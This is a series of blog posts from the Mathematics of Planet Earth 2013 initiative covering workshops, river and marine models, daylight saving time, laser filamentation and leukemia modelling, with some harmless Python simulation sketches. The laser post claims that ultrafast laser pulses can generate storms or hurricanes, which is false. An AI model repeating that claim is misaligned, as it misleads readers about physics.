The main objective of the workshop was to provide a forum for the exchange of empirical results and modelling frameworks for spatially distributed aquatic systems, with a particular focus on issues of management and sustainability. These problems are of particular interest to Canada with its thousands of lakes, many major rivers, countless streams and three bordering oceans. Understanding the connections between these waters and their ecosystems is essential to understanding the impacts of human activities. Stresses on lake populations include events upstream; introduced species spread through networks of lakes and rivers; colonizers from marine protected areas may rescue impacted ecosystems, but the stress from these impacts may also spread to protected areas. The AARMS workshop aimed to foster a cross-disciplinary exchange of ideas and techniques between mathematicians, ecologists and resource managers, leading to new opportunities for mathematicians, and new tools for managers.

The first two days of the workshop focused on the mathematics of river networks, while the second two days focused on spatially explicit marine systems. In both cases, equal emphasis was placed on detailed, data-rich models and on simpler strategic models, with the simpler models providing a baseline for studies of detailed spatially explicit simulations of rivers and streams. Continuing advances in the power and availability of high-performance computing lead to steadily richer hydrodynamic models for rivers and coasts, and modellers are now moving to integrate physiological and behavioural models for fish and other organisms into these detailed hydrodynamic models. At the same time, these large tactical models are balanced by studies of simpler dynamical systems on connected patches and graphs representing river networks and coastal habitats. Although there were many similarities in the mathematics for riverine and coastal systems, there were also interesting differences. As expected, spatial models of river systems were based on branching networks, and a recurring question was the effect of barriers on species persistence. In contrast, metapopulation models made an appearance in modelling marine systems. Even in coastal systems, where the domain might be reasonably represented by a one-dimensional chain of habitats, marine organisms are free to disperse in two or three dimensions and can move from one habitat to another without passing through the intervening patches. The same is not true of river networks, where most organisms are constrained to move along the network.
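As a concrete, if toy, illustration of the “simpler strategic models” mentioned above, here is a hypothetical sketch of patch dynamics on a small branching river network: logistic growth in each patch plus dispersal along the branches. The network layout, growth rate, and dispersal rates are invented for the example and are not taken from any talk at the workshop.

```python
# Minimal sketch of a simple strategic patch model on a small river network:
# logistic growth in each patch plus dispersal along the branches.  The network,
# parameters, and dispersal rates are invented for illustration only.
import numpy as np

# Patches 0 and 1 are headwater streams joining at patch 2, which drains to patch 3.
edges = [(0, 2), (1, 2), (2, 3)]          # (upstream, downstream) pairs
n = 4
r, K = 0.5, 1.0                            # growth rate and carrying capacity
d_down, d_up = 0.30, 0.05                  # downstream drift vs upstream movement

# Build a dispersal matrix D where D[i, j] is the per-unit-time rate from j to i
D = np.zeros((n, n))
for up, down in edges:
    D[down, up] += d_down                  # drift with the current
    D[up, down] += d_up                    # active upstream movement
np.fill_diagonal(D, -D.sum(axis=0))        # losses balance what leaves each patch

x = np.array([0.5, 0.5, 0.0, 0.0])         # start with organisms in headwaters only
dt = 0.01
for _ in range(int(200 / dt)):             # forward-Euler integration
    x = x + dt * (r * x * (1 - x / K) + D @ x)

print("equilibrium densities by patch:", np.round(x, 3))
```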

The talks and discussion covered a wide variety of topics: open data, invasive species, persistence, hydropower, range shifts, sustainable and optimal fisheries, and restoration, to name a few. The list of speakers and detailed abstracts can be found on the workshop website.

We would like to acknowledge the generous support of NSF, SMB, AARMS and CRM, without which the workshop would not have been possible. We would also like to thank the helpful staff of the Fredericton Inn.

James Watmough
Department of Mathematics and Statistics
University of New Brunswick
watmough@unb.ca

Posted in Ecology, Workshop Report | Leave a comment

Contagious Behavior

There has been some press coverage of an article that appeared in the October 4, 2013, issue of Science called “Social Factors in Epidemiology” by Chris Bauch and Alison Galvani. The article highlights how social factors and social responses are intertwined in biological systems. For example, a perception that vaccines are harmful can cause a drop in vaccination coverage. The point that the authors are making is that mathematical modelers are now creating models that are tailored to include social behaviors in their systems to better predict things like the spread of a disease. Hence, getting clues from social media sources like Facebook and Twitter is useful. (To read the article you need access to Science, but a note about the article is available in Science Daily.)

While it seems nice to once again (as the MPE2013 initiative likes to do) point out the usefulness of mathematics, I was struck by how little mathematics was actually in the article. The authors did make a strong case, in an anecdotal sort of way, that social factors are important, and it did appear that the mathematical models were network-type models, but there seemed to be little of any mathematical substance.

Reading the article, I was reminded of the work done by Martina Morris using random network models and the success of those models in predicting HIV spread. Two earlier blog posts, from June 6 and July 2, showcase the exciting work done by her and other mathematicians using random graph models. There have been several other posts on this site devoted to modeling disease spread. I found all of these more interesting than the Science article. I also wondered how beneficial the work of Morris and others would be for the epidemiology questions asked by Bauch and Galvani; I would speculate quite a bit. And I am curious how aware the different researchers are of these and other developments and, ironically, whether social behavior of a different sort is somehow at play here.

Estelle Basor
AIM

Posted in Complex Systems, Dynamical Systems, Mathematics, Public Health | Leave a comment

Mathematics, Sustainability, and a Bridge to Decision Support

The November issue of The College Mathematics Journal is a special theme issue supporting the Mathematics of Planet Earth initiative, MPE 2013. The issue is freely available to all.

Of special interest is a guest editorial by Mary Lou Zeeman (Bowdoin College). It is a call to arms for the mathematics community to identify and engage, at a deeply intellectual level, with the mathematical challenges associated with decision making for sustainability.

In the article, Zeeman draws an analogy with mathematical biology, to illustrate the way mathematics and biology can enrich each other when we make the effort to build and facilitate communication between them.

You can download the article from JSTOR by clicking here. Read it, share it with your colleagues and students, and treat it as a straw-man for discussions as you come up with better ways to build up the mathematics-decision support bridge!

Posted in General | Leave a comment

Not on the Test: The Pleasures and Uses of Mathematics

On Wednesday, November 6, Inez Fung will deliver a public lecture at the Berkeley City College Auditorium on the topic “Verifying Greenhouse Gas Emissions” as part of their series Not on the Test: The Pleasures and Uses of Mathematics.

Fung has previously delivered one of the MPE 2013 invited lectures. Her MPE lecture was given at the African Institute for Mathematical Sciences; a recording of her lecture is available on their web site. An eloquent advocate for the role of mathematics and computation in climate science, Fung has also delivered technical presentations at SIAM conferences. One such talk led to a SIAM News article in 2010, titled “Mathematical Challenges in Climate Change Science.” Her work was also featured in a SIAM News article by Dana Mackenzie in 2007, “Mathematicians Confront Climate Change.”

Inez Fung’s Berkeley public lecture will begin at 7:00 p.m.

Posted in Public Event | Leave a comment

MPE Issue of the College Mathematics Journal of the MAA

The November issue of The College Mathematics Journal is a special theme issue supporting the Mathematics of Planet Earth initiative, MPE 2013. The articles in this extra large issue discuss a wide range of earth science and environmental questions. The issue is freely available to all.
 
Charles Hadlock applies undergraduate mathematics (linear equations, interpolation, geometry) to modeling the movement of water underground. Meredith Greer, Holly Ewing, Kathleen Weathers, and Kathryn Cottingham describe a mathematical/ecological collaborative study of a cyanobacterium (attractively named Gloeo) in New England lakes. Osvaldo Marrero describes a statistical method for detecting seasonal variation in an epidemic. (Such variation may betray an environmental influence.) And Christiane Rousseau describes the discovery of the Earth’s inner core by Inge Lehmann.
 
Four articles/Classroom Capsules/Student Research Projects concern climate change. Two papers (by, respectively, James Walsh and Richard McGehee, and Emek Köse and Jennifer Kunze) apply dynamical systems and differential equations to modeling global temperature; a Classroom Capsule by John Zobitz discusses carbon absorption in forests; and a Student Research Project by Lily Khadjavi describes how to coax students to model the rate of climate change.
 
The issue begins with a guest editorial by Mary Lou Zeeman relating mathematics to sustainability and concludes with a review by Ben Fusaro of the recent book “Mathematics for the Environment” by Martin Walter.
 
— Michael Henle, Editor

Posted in General | Leave a comment

Controlling Lightning?

Halfway between chemistry and physics, the exploration of applications of ultrafast laser pulses is a very promising research topic with many potential applications, including meteorology and climate. These ultrafast laser pulses range over a time scale of femtoseconds ($10^{-15}$ seconds) to attoseconds ($10^{-18}$ seconds, the natural time scale of the electron). Modern laser technology allows the generation of ultrafast (few-cycle) pulses whose electric fields exceed the internal electric field in atoms and molecules, $E = 5 \times 10^9\,$ V/cm, corresponding to the intensity $I = 3.5 \times 10^{16}\,$ W/cm${}^2$.

The interaction of such pulses with atoms and molecules leads to regimes where new physical phenomena can occur, such as High Harmonic Generation (HHG), from which the shortest attosecond pulses have been created. One of the major experimental discoveries in this new regime is Laser Pulse Filamentation (LPF), first observed by Mourou and Braun in 1995, in which intense, narrowly confined pulses can propagate over large distances. The discovery has led to intensive investigations in physics and applied mathematics to understand new effects such as the creation of solitons, the self-transformation of these pulses into white light, intensity clamping, and multiple filamentation.

Potential applications include wave-guide writing, atmospheric remote sensing, and lightning guiding. Laboratory experiments show that intense and ultrafast laser pulses propagating in the atmosphere create successive optical solitons. These highly nonlinear, nonperturbative phenomena are modeled by nonlinear Schroedinger equations (NLSEs), allowing the prediction of new phenomena such as “rogue” waves, also associated with tsunamis in oceanography. (Nonperturbative means that it is impossible to separate the global system into two parts: a dominant system and a small perturbation of it. When such a decomposition exists, it allows one to use perturbation methods to analyze the solutions of the global system in terms of the solutions of the dominant system.)
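For readers who want to see the type of equation involved, a commonly used simplified envelope model for filamentation (not necessarily the exact system used in the works cited here) is the cubic nonlinear Schroedinger equation for the field envelope $\mathcal{E}(x,y,z)$ propagating along $z$:

$$\frac{\partial \mathcal{E}}{\partial z} = \frac{i}{2 k_0}\,\nabla_{\perp}^{2}\,\mathcal{E} + i\,k_0 n_2\,|\mathcal{E}|^{2}\,\mathcal{E},$$

where $k_0$ is the central wavenumber, $n_2$ the Kerr index of the medium, and $|\mathcal{E}|^{2}$ the intensity. The first term describes diffraction and the second Kerr self-focusing; filamentation results from their competition, and more complete models add group-velocity dispersion, plasma defocusing, and ionization losses.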

Cloud of water droplets

Cloud of water droplets generated in a cloud chamber by laser filaments (in red). The cloud is demonstrated through the scattering of a green laser beam collinear to the first one.

Field experiments of self-guided ionized filaments for real-scale atmospheric testing are carried out, for instance by Teramobile, an international project initiated jointly by the National Center for Scientific Research (CNRS) in France and the German Research Foundation (DFG). Recently it was discovered that such intense laser pulses can create optical “rogue” waves. It is also known that these intense ultrafast pulses can generate storms or hurricanes within a distance of a few kilometers.

This raises the extremely interesting question: Is there a way to use these laser pulses to control atmospheric perturbations? Research goes in at least two directions. The first is to exploit laser-filament-induced condensation of water vapor, even in subsaturated conditions. The second is to use laser filaments to control lightning, with the hope, in particular, of being able to protect critical facilities.

A first conference on Laser-based Weather Control (LWC2011) took place in 2011. A second Conference (LWC2013) took place at the World Meteorological Organization (WMO) in Geneva last September. On the home page of the conference we find the following statement:

“As highlighted by the success of the first Conference on Laser-based Weather Control in 2011, ultra-short lasers launched into the atmosphere have emerged as a promising prospective tool for weather modulation and climate studies. Such prospects include lightning control and laser-assisted condensation, as well as the striking similarities between the non-linear optical propagation and natural phenomena like rogue waves or climate bifurcations. Although these new perspectives triggered an increasing interest and activity in many groups worldwide, the highly interdisciplinary nature of the subject limited its development, due to the need for enhanced contacts between laser and atmospheric physicists, chemists, electrical engineers, meteorologists, and climatologists. Further strengthening this link is precisely the aim of the second Conference on Laser, Weather and Climate (LWC2013) in Geneva, gathering the most prominent specialists on both sides for tutorial talks, free discussions as well as networking.”

Where is the mathematics in all this? The phenomena induced by intense ultrafast laser pulses are nonperturbative and highly nonlinear. The phenomena are studied through highly nonlinear PDEs. This is why the Centre de recherches mathématiques (CRM) is organizing a workshop “Mathematical models and methods in Laser Filamentation” at the University of Montreal, March 10-14, 2014. It is organized by André Dieter Bandrauk (Sherbrooke and CRM), Emmanuel Lorin de la Grandmaison (Carleton and CRM) and Jerome V. Moloney (Maths and Optics Center, U. Arizona).

Reference
Laser-Based Weather Control, Jérôme Kasparian, Ludger Wöste and Jean-Pierre Wolf, Optics & Photonics News, July/August 2010, OSA.

Christiane Rousseau

Posted in Weather, Workshop Announcement | Leave a comment

Mathematics and Conflict Resolution

One of the main ideas behind the MPE2013 project was to showcase how mathematics solves the problems of the planet in ways that are analytical and useful. At the heart of this initiative is the belief that when one uses mathematical models, the results are unemotional and valid, at least when the model is a good approximation to the problem at hand. The hope then is that those in power will pay attention to the mathematics. This of course assumes something about the reasonableness of those in power, but for topics like climate change, the neutrality of mathematics should be an advantage in arguing for policy change.

The November issue of the AMS Notices has an intriguing article about the use of mathematics to help solve the Middle East conflict. The authors, Thomas L. Saaty and H. J. Zoffer, discuss how the Analytic Hierarchy Process (AHP) can be used to help sort out the complex issues of the Israeli-Palestinian conflict. In their words, the advantage of the AHP in dealing with conflicts is “that the process creatively decomposes complex issues into smaller and more manageable segments. It also minimizes the impact of unrestrained emotions by imposing a mathematical construct, pairwise comparisons and prioritization with a numerical ordering of the issues and concessions.” The article reports in detail (and fills in some of the mathematics at its core) on a meeting of the two sides held in Pittsburgh, Pennsylvania, in August of 2011, where important progress was made in addressing the critical issues of the conflict. The Pittsburgh Principles were the outcome of that meeting, and they are described at the end of the article. The article is available here.

Estelle Basor
AIM

Posted in Mathematics, Political Systems, Social Systems | Leave a comment

SAMSI Workshop – Dynamics of Seismicity, Earthquake Clustering and Patterns in Fault Networks

Despite considerable research, earthquake dynamics remains one of the major challenges in geophysics. A recent workshop on Dynamics of Seismicity, Earthquake Clustering and Patterns in Fault Networks at SAMSI in Research Triangle Park, North Carolina, was organized to achieve progress in this field by taking advantage of newly available data sets and statistical techniques. The workshop was part of the international program “Mathematics of Planet Earth 2013” and was organized in cooperation with the Bernoulli Society for Mathematical Statistics and Probability via the Committee on Probability and Statistics in Physical Sciences and the International Union of Geodesy and Geophysics via the Commission on Mathematical Geophysics.

The main goal of the workshop was to build and strengthen emerging links between active research groups in different scientific areas—statistics, probability, mathematics, physics, seismology and computer science—toward achieving a solid understanding of seismicity patterns and structures and a physical theory for earthquake dynamics. The workshop highlighted the key role of the mathematical sciences in studying seismicity dynamics in relation to properties of faults and the Earth’s crust.

SAMSI Workshop on Seismicity

Quality and availability of seismic data was one of the workshop topics. Many studies of seismicity are based on regional or global earthquake catalogs, usually produced by the regional seismic networks in the US. The global ComCat catalog of USGS/ANSS is a merged version of all catalogs produced in the US, including the global NEIC catalog. Most seismic networks also produce real-time catalogs automatically, but these are usually of lesser quality than the human-reviewed catalogs. As real-time catalogs improve and the cost of producing human-reviewed catalogs increases, network operators and researchers are faced with the question of whether the real-time catalogs are sufficient. This question is particularly pressing in the current budget climate, which has already had a negative impact on catalog production. The real-time catalogs meet the need for rapid notification to emergency managers; however, they may not provide an accurate count of small earthquakes, and in some cases magnitudes for events less than M3 may be incorrect or a few events may be mislocated. The research community that works with seismicity catalogs could provide minimum quality criteria, which could then be used to judge which catalogs are of sufficient quality for seismicity research.

SAMSI Workshop on Seismicity

The workshop participants discussed several key topics related to earthquake dynamics: (i) state-of-the-art seismic data and its complexity (Egill Hauksson, Caltech, and Yehuda Ben-Zion, USC); (ii) earthquake clustering and triggering (Zhigang Peng, Georgia Tech; Ilya Zaliapin, U of Nevada, Reno; and Joern Davidsen, U of Calgary); (iii) statistical and mathematical modeling and forecasting (Antoinette Tordesillas, U of Melbourne; Bala Rajaratnam, Stanford; Philip Stark, UC Berkeley; Dave Harte, Statistical Research Associates, New Zealand; and Karin Dahmen, U of Illinois Urbana-Champaign).

Further information can be found at the workshop site.

Yehuda Ben-Zion, University of Southern California
Jörn Davidsen, University of Calgary
Egill Hauksson, California Institute of Technology
Ilya Zaliapin, University of Nevada, Reno

Posted in Geophysics, Statistics, Workshop Report | Leave a comment

Extracting Boats in Harbors from High-resolution Satellite Images

Do you know that over 50 satellites are launched every year to orbit the Earth? Have you ever wondered what the purpose of those satellites is? Here is one of them!

With the launch of the first satellite, a new way of gathering information about the Earth’s surface has emerged. Highly sophisticated cameras are built on the satellites to obtain very high resolution images. Satellites nowadays provide images at a resolution of 0.3 meters! It means that you can even identify your own scooter! Huge amounts of data are collected every day using these cameras. Still, all this data is meaningless, unless the images are further analyzed and understood.

A first step in understanding what is represented in an image is to identify the objects which it contains. We will focus here on identifying boats in harbor images. Boat extraction in harbors is a preliminary step in obtaining more complex information from images such as traffic flow within the harbor, unusual events, etc.

When you look at a satellite image of a harbor, you can visually detect the boats based on their characteristics such as the fact that they are usually in water, their white color or their elliptical shape. All these characteristics make it easy for us humans to correctly identify the boats and discriminate them from other objects such as cars, buildings or trees. Nevertheless, humans know the concept of a boat, while computers don’t. Tell a computer to identify a boat and it won’t know what you’re talking about.

In order to use a computer to detect boats, one must first identify all the characteristics that make a boat unique. Some of them were mentioned before; can you think of others? Once you write down a list of all such characteristics, you then have to define them in a mathematical manner. Put all these mathematical characteristics together and you have developed a mathematical model for boats in harbors. Keep in mind that you must model both the boat itself and the relationships between boats. One example of a relationship between two boats is the fact that they are usually not allowed to overlap. Note that if the final result is not satisfactory, it probably means that the model is poor and you should try to improve it!

The last step is to integrate this model into a framework that allows you to extract only those objects that fit the model and neglect all others. Probabilities play an important role in this step. The computer will search for a configuration of objects until it finds the one that best describes the real data in the image. In the best case scenario you’ll end up with a configuration that incorporates all the boats in the harbor and can then move on to doing more interesting stuff with it!
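To give a flavor of how such a model-plus-search pipeline might look, here is a highly simplified, hypothetical sketch (it is not the authors’ actual marked-point-process framework). It scores candidate “boats” (bright, axis-aligned ellipses) by their contrast against the surrounding water and then greedily keeps the best-scoring, non-overlapping candidates on a small synthetic image.

```python
# Highly simplified sketch of model-based object extraction on a synthetic image:
# score candidate "boats" (bright axis-aligned ellipses) by contrast against the
# surrounding water, then keep the best-scoring non-overlapping candidates.
import numpy as np

rng = np.random.default_rng(1)
H, W = 120, 160
image = 0.2 + 0.05 * rng.standard_normal((H, W))   # dark "water" background

def ellipse_mask(cy, cx, a, b):
    yy, xx = np.mgrid[0:H, 0:W]
    return ((yy - cy) / a) ** 2 + ((xx - cx) / b) ** 2 <= 1.0

# Paint three synthetic bright "boats" into the water
true_boats = [(30, 40, 5, 12), (70, 90, 6, 14), (95, 30, 4, 10)]
for cy, cx, a, b in true_boats:
    image[ellipse_mask(cy, cx, a, b)] = 0.9

# Candidate configurations: a coarse grid of possible boat positions
candidates = [(cy, cx, 5, 12) for cy in range(10, H - 10, 5)
                              for cx in range(12, W - 12, 5)]

def data_term(c):
    """Contrast between the inside of the ellipse and a surrounding ring."""
    cy, cx, a, b = c
    inside = ellipse_mask(cy, cx, a, b)
    ring = ellipse_mask(cy, cx, a + 4, b + 4) & ~inside
    return image[inside].mean() - image[ring].mean()

def overlaps(c1, c2):
    """Crude pairwise prior: reject configurations whose ellipses intersect."""
    return (ellipse_mask(*c1) & ellipse_mask(*c2)).any()

# Greedy search for a high-scoring, non-overlapping configuration
detected = []
for c in sorted(candidates, key=data_term, reverse=True):
    if data_term(c) < 0.3:           # stop once contrast is too low to be a boat
        break
    if not any(overlaps(c, d) for d in detected):
        detected.append(c)

print("detected boats (cy, cx, a, b):", detected)
```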

Paula Crăciun and Josiane Zerubia
INRIA Sophia-Antipolis Méditerranée
BP 93, 2004 Route des Lucioles
06902 Sophia-Antipolis Cedex – France
URL: https://team.inria.fr/ayin/

Posted in Imaging | Leave a comment

Changing our Clocks

This Sunday, most of the United States and Canada changes from Daylight Saving Time (DST) to Standard Time: at 2:00 a.m. local time, clocks fall back to 1:00 a.m. This event, which happens every year on the first Sunday in November, is the reverse of what happens in the spring: on the second Sunday in March at 2:00 a.m., clocks spring forward to 3:00 a.m.

Effectively, DST moves an hour of daylight from the morning to the evening. The modern idea of daylight saving was first proposed by the New Zealand entomologist George Vernon Hudson in 1895 in a paper to the Wellington Philosophical Society [1]. It was first implemented on April 30, 1916, by Germany and its war-time ally Austria-Hungary as a way to conserve coal.

This annual ritual does not happen everywhere and does not happen everywhere at the same time. In the U.S. and Canada, each time zone switches at a different time. DST is not observed in Hawaii, American Samoa, Guam, Puerto Rico, the Virgin Islands, the Commonwealth of Northern Mariana Islands, and Arizona. The Navajo Nation participates in the DST policy, even in Arizona, due to its large size and location in three states. However, the Hopi Reservation, which is entirely surrounded by the Navajo Nation, doesn’t observe DST. In effect, there is a donut-shaped area of Arizona that does observe DST, but the “hole” in the center does not.

The timing of the changeover, 2:00 a.m., was originally chosen because it was practical and minimized disruption. Most people were at home and this was the time when the fewest trains were running. It is late enough to minimally affect bars and restaurants, and it prevents the day from switching to yesterday, which would be confusing. It is early enough that the entire continental U.S. switches by daybreak, and the changeover occurs before most early shift workers and early churchgoers are affected.

In the U.S., the dates of the changeover were set in 2007. Widespread confusion was created during the 1950s and 1960s when each U.S. locality could start and end DST as it desired. One year, 23 different pairs of DST start and end dates were used in Iowa alone. For exactly five weeks each year, Boston, New York, and Philadelphia were not on the same time as Washington D.C., Cleveland, or Baltimore—but Chicago was. And, on one Ohio to West Virginia bus route, passengers had to change their watches seven times in 35 miles!

The Minnesota cities of Minneapolis and St. Paul once didn’t have twin perspectives with regard to the clock. These two large cities are adjacent at some points and separated only by the Mississippi River at others, and are considered a single metropolitan area. In 1965, St. Paul decided to begin its Daylight Saving Time period early to conform to most of the nation, while Minneapolis felt it should follow Minnesota’s state law, which stipulated a later start date. After intense inter-city negotiations and quarreling, the cities could not agree, and so the one-hour time difference went into effect, bringing a period of great time turmoil to the cities and surrounding areas.

Indiana has long been a hotbed of DST controversy. Historically, the state’s two western corners, which fall in the Central Time Zone, observed DST, while the remainder of the state, in the Eastern Time Zone, followed year-round Standard Time. An additional complication was that five southeastern counties near Cincinnati and Louisville unofficially observed DST to keep in sync with those cities. Because of the longstanding feuds over DST, Indiana politicians often treated the subject gingerly. In 1996, gubernatorial candidate Rex Early firmly declared, “Some of my friends are for putting all of Indiana on Daylight Saving Time. Some are against it. And I always try to support my friends.” In April 2005, Indiana legislators passed a law that implemented DST statewide beginning on April 2, 2006.

The North American system is not universal. The countries of the European Union use Summer Time, which begins the last Sunday in March (one or two weeks later than in North America) and ends the last Sunday in October (one week earlier than in North America). All time zones change at the same moment, at 1:00 a.m. Universal Time (the successor of Greenwich Mean Time).

The only African countries and regions which use DST are the Canary Islands, Ceuta and Melilla (Spain), Madeira (Portugal), Morocco, Libya, and Namibia.

In Antarctica, there is no daylight in the winter and months of 24-hour daylight in the summer. But many of the research stations there still observe Daylight Saving Time anyway, to synchronize with their supply stations in Chile or New Zealand.

Proponents of DST generally argue that it saves energy, while opponents argue that actual energy savings are inconclusive. DST’s potential to save energy comes primarily from its effects on residential lighting, which consumes about 3.5% of electricity in the United States and Canada [2]. Delaying the nominal time of sunset and sunrise reduces the use of artificial light in the evening and increases it in the morning. As Franklin’s 1784 satire pointed out, lighting costs are reduced if the evening reduction outweighs the morning increase, as in high-latitude summer when most people wake up well after sunrise. An early goal of DST was to reduce evening usage of incandescent lighting, formerly a primary use of electricity. Although energy conservation remains an important goal, energy usage patterns have greatly changed since then, and recent research is limited and reports contradictory results. Electricity use is greatly affected by geography, climate, and economics, making it hard to generalize from single studies [2].

References:

[1] G. V. Hudson (1895). “On seasonal time-adjustment in countries south of lat. 30°”. Transactions and Proceedings of the New Zealand Institute 28: 734.

[2] Myriam B.C. Aries and Guy R. Newsham (2008). “Effect of daylight saving time on lighting energy use: a literature review”. Energy Policy 36 (6): 1858–1866. doi:10.1016/j.enpol.2007.05.021.

Posted in Energy, General | Leave a comment

Mathematical Modeling and Leukemia

A multidisciplinary group of mathematicians, biologists, and hematologists from Romania is involved in developing new mathematical models of leukemia, with the goal of helping the medical community better understand the disease and develop adequate treatment routines. Since, for a given patient, the evolution of the disease strongly depends on the features of his or her disease (mathematically speaking, on specific parameters), these treatment strategies should be adapted to the patient's characteristics.

Commonly, leukemia is defined as a cancer characterized by an abnormal proliferation of blood cells, caused by pathological modifications of hematopoiesis. Hematopoiesis is the process of production of all types of blood cells that includes formation, development and differentiation. At the origin of all blood cells are the hematopoietic stem cells.

When a hematopoietic stem cell enters the cell cycle, it can undergo three types of division:

  • Symmetric self-renewal: from a stem cell, after division, two identical stem cells will appear;
  • Asymmetric division: from a stem cell will result another stem cell and a more differentiated cell (a progenitor);
  • Symmetric differentiation: from a stem cell will result two progenitors.

The capacity of a hematopoietic cell to proliferate decreases during the process of differentiation and maturation, such that a mature cell loses this ability. The cells with self-renewal ability are called stem-like cells.

There are many types of leukemias, classified according to the type and age of the cell involved in the malignant transformation, so leukemias can be myeloid or lymphoid, acute or chronic. One of the most studied types of leukemia, also from a mathematical point of view, is Chronic Myelogenous Leukemia (CML). The disease is believed to arise from a hematopoietic stem cell in the earliest phase of development. A chromosomal abnormality is responsible for the initiation of the disease. This abnormality is a reciprocal translocation between one chromosome 9 and one chromosome 22, the consequence being one chromosome 9 longer than normal and one chromosome 22 shorter than normal. The latter is called the Philadelphia chromosome and is denoted Ph. The consequence of this process is a fusion gene causing the production of an abnormal tyrosine kinase protein, called Bcr-Abl, which is at the origin of the transformation of normal hematopoietic cells into abnormal leukemic cells.

For more than 10 years there has been a standard treatment for CML, namely Imatinib mesylate, a molecularly targeted drug which binds highly specifically to Bcr-Abl. In this way it blocks the abnormal protein and thus removes the proliferative advantage that it provides to cancer cells. Under Imatinib, almost all patients attain hematological remission, 80% attain complete cytogenetic remission, and the estimated overall survival is 93% at 10 years. However, Imatinib does not always completely eradicate residual leukemia cells, and some patients may relapse once the treatment is stopped.

It is commonly accepted that a quantitative understanding of cancer biology requires the development of a mathematical framework to describe the fundamental principles leading to tumor initiation and expansion. Accordingly, mathematical models can be used to study cancer initiation, progression, and responses to therapy. Only when the dynamics of cancer cells during therapy are understood can quantitatively precise predictions be made about treatment success, cancer cell kinetics, or therapy failure due to resistance. Thus, mathematical models are important to a complete understanding of targeted therapy.

The process of hematopoiesis, involving the cell cycle, can be described by a feedback model that uses delay differential equations (DDEs) for the time evolution of the densities of the cell populations involved. Such a model was first introduced by M. C. Mackey and L. Glass (see, e.g., [3]) for stem cells. When one concentrates on a single line of mature cells, leukocytes in the case of CML, two delays must be considered in the model, namely $\tau_1$, the duration of the cell cycle, and $\tau_2$, the time needed for maturation.
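As an illustration of the type of equation involved (a classical single-population caricature, not the full CML model described below), a Mackey-Glass-type equation for the density $x(t)$ of stem-like cells reads

$$\frac{dx}{dt}(t) = -\gamma\, x(t) + \beta\big(x(t-\tau_1)\big)\, x(t-\tau_1), \qquad \beta(x) = \frac{\beta_0\,\theta^{n}}{\theta^{n} + x^{n}},$$

where $\gamma$ collects the loss rates (apoptosis and differentiation), $\beta$ is a Hill-type feedback function modeling self-renewal, and the delay $\tau_1$ accounts for the duration of the cell cycle.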

A schematic representation of these interactions and terms involved is given below.


 

The time evolution of the stem-like population depends on losses, through apoptosis (cell death) and through entering the cell cycle (including all kinds of proliferation: self-renewal, asymmetric division, and differentiation), and on gains, due to the cells that entered the cell cycle $\tau_1$ time units ago to self-renew or to divide asymmetrically and that now leave the cell cycle and reinforce the stem-like population. The time evolution of the mature population depends on losses through apoptosis and on gains due to differentiation and asymmetric division. An amplification factor $A_N$ is used to describe the multiplication of cells through a series of divisions until they become mature cells. A linear treatment effect can also be considered when the CML cell populations are modeled.

 

A more realistic model considers four cell densities varying in time (i.e., state variables): $x_1$, the stem-like healthy cell population; $x_2$, the healthy mature cell population; $y_1$, the stem-like CML population; and $y_2$, the mature CML population. With specific parameter values for healthy and leukemic cells, the model includes competition through the feedback Hill functions that model self-renewal and differentiation and that depend on the total cell densities. Treatment can also be introduced, acting specifically on the apoptosis, self-renewal, and differentiation rates.

One example is given in the simulations below, where one can see the evolution of healthy and leukemic cells when a constant treatment is applied.
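For readers who want to experiment, here is a toy two-population simulation in the same spirit. It is not the authors’ four-equation model, and all parameter values are invented: each population self-renews with a delayed Hill-type feedback on the total density, and a constant treatment term raises the loss rate of the leukemic population.

```python
# Toy simulation (not the authors' four-population model): two cell populations
# with delayed Hill-type self-renewal, competing through a shared feedback, and
# a constant "treatment" that raises the loss rate of the leukemic population.
# All parameter values are invented for illustration.
import numpy as np

dt, tau, T = 0.01, 2.0, 200.0          # time step, cell-cycle delay, horizon
steps, lag = int(T / dt), int(tau / dt)

gamma_h, gamma_l = 0.10, 0.08          # baseline loss rates (healthy, leukemic)
beta0_h, beta0_l = 0.60, 0.80          # maximal self-renewal rates
theta, n_hill = 1.0, 2.0               # Hill feedback parameters
treatment = 0.15                        # constant extra loss rate for leukemic cells

def beta(total, beta0):
    """Hill-type feedback: self-renewal drops as total cell density rises."""
    return beta0 * theta**n_hill / (theta**n_hill + total**n_hill)

# State histories (the right-hand side looks back tau time units)
x = np.zeros(steps + 1); x[0] = 0.5    # healthy stem-like cells
y = np.zeros(steps + 1); y[0] = 0.5    # leukemic stem-like cells

for k in range(steps):
    xd = x[max(k - lag, 0)]            # delayed states (constant pre-history)
    yd = y[max(k - lag, 0)]
    total_d = xd + yd
    dx = -gamma_h * x[k] + beta(total_d, beta0_h) * xd
    dy = -(gamma_l + treatment) * y[k] + beta(total_d, beta0_l) * yd
    x[k + 1] = x[k] + dt * dx          # forward Euler, in the spirit of the method of steps
    y[k + 1] = y[k] + dt * dy

print("final densities  healthy: %.3f   leukemic: %.3f" % (x[-1], y[-1]))
```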

A more complex model can bring the action of the immune system into the picture. The number of equations increases, as does the number of delays to be considered. Several new feedback loops regulate the interactions of the cell lines with the immune system.

The study of these mathematical models usually starts by looking for equilibria and analyzing their stability. Eventually, a periodic evolution of the disease may be predicted due to the existence of a Hopf bifurcation, when limit cycles appear. A new problem in this case is the analysis of the stability of these limit cycles (see [1]). Periodic evolutions can also appear in a context different from bifurcation of equilibria (see [2]).

Acknowledgement. The work described above has been supported by the CNCS Romania Grant ID-PNII-PCE-2011-3-0198. The team involved in this research also comprised our colleagues S. Balea, D. Coriu, D. Candea, D. Jardan, M. Neamtu, and C. Safta.

References

[1] D. Candea, A. Halanay, I.R. Radulescu (2013), Stability analysis in a model for stem-like hematopoietic cells dynamics in leukemia under treatment, Ann. Acad. Rom. Sci., Ser. Math. Appl. 5, 1-2, 148-176.

[2] A. Halanay (2012),   Periodic solutions in a mathematical model for the treatment of chronic myelogenous leukemia, Mathematical Modeling of Natural Phenomena, vol.7, no.1, 235-244.

[3] Mackey, M.C. (1997), Mathematical models of hematopoietic cell replication and control, Case Studies in Mathematical Modeling–Ecology, Physiology and Cell Biology. New Jersey: Prentice-Hall, 151–182.

 

Andrei Halanay and Rodica Radulescu
Department of Mathematics and Informatics
University Politehnica of Bucharest
Bucharest, ROMANIA

Posted in Disease Modeling, Dynamical Systems | Leave a comment

Mathematics of Another Sphere

